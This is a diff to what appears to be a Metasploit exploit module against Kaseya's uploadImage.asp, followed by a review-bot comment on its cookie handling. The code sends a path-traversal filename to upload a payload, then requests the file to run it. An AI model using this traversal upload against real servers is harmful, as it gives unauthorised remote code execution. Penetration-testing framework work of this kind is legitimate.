diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
index d33ae5d8fa..a73caed524 100644
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'method' => 'POST',
 'uri' => normalize_uri('SystemTab','uploadImage.asp')
 })
-
+
 # the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
 if not res or res.code != 500
@@ -53,21 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
 return Exploit::CheckCode::Appears
 end
- def get_cookie
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => normalize_uri("SystemTab", "uploadImage.asp")
- })
-
- if res and res.headers['Set-Cookie']
- cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
- else
- fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
- end
-
- cookie
- end
-
 def exploit
 peer = "#{rhost}:#{rport}"
@@ -80,8 +65,14 @@ class Metasploit3 < Msf::Exploit::Remote
 data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
- cookie = get_cookie
- res = send_request_raw({
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri("SystemTab", "uploadImage.asp")
+ })
+
+ cookie = res.get_cookies
+
+ res = send_request_cgi({
 "method" => "POST",
 "uri" => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
 "data" => data,
@@ -89,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote
 "cookie" => cookie
 })
- register_files_for_cleanup(@payload_name)
-
 if not res or res.code != 200
 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
 end
+ register_files_for_cleanup(@payload_name)
+
 print_status("#{peer} - Executing payload #{@payload_name}")
 res = send_request_cgi({
 'uri' => normalize_uri(@payload_name),
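Review bot: In the third hunk (`@@ -80,8 +65,14 @@`), `cookie = res.get_cookies` dereferences `res` without a nil guard, so a timeout or connection failure on the preceding GET raises `NoMethodError` instead of a clean module failure; the deleted `get_cookie` helper checked `res` and the presence of a cookie before continuing, and that check is lost in the inlined version. As far as I recall `get_cookies` returns an empty string rather than `nil` when no `Set-Cookie` header is present, so an empty cookie would also pass silently into the upload request below. I would replace the assignment with `fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") if res.nil? || res.get_cookies.empty?` followed by `cookie = res.get_cookies`; `peer` is the local defined at the top of `exploit` in the previous hunk. The `exploit` method continues past the end of this hunk.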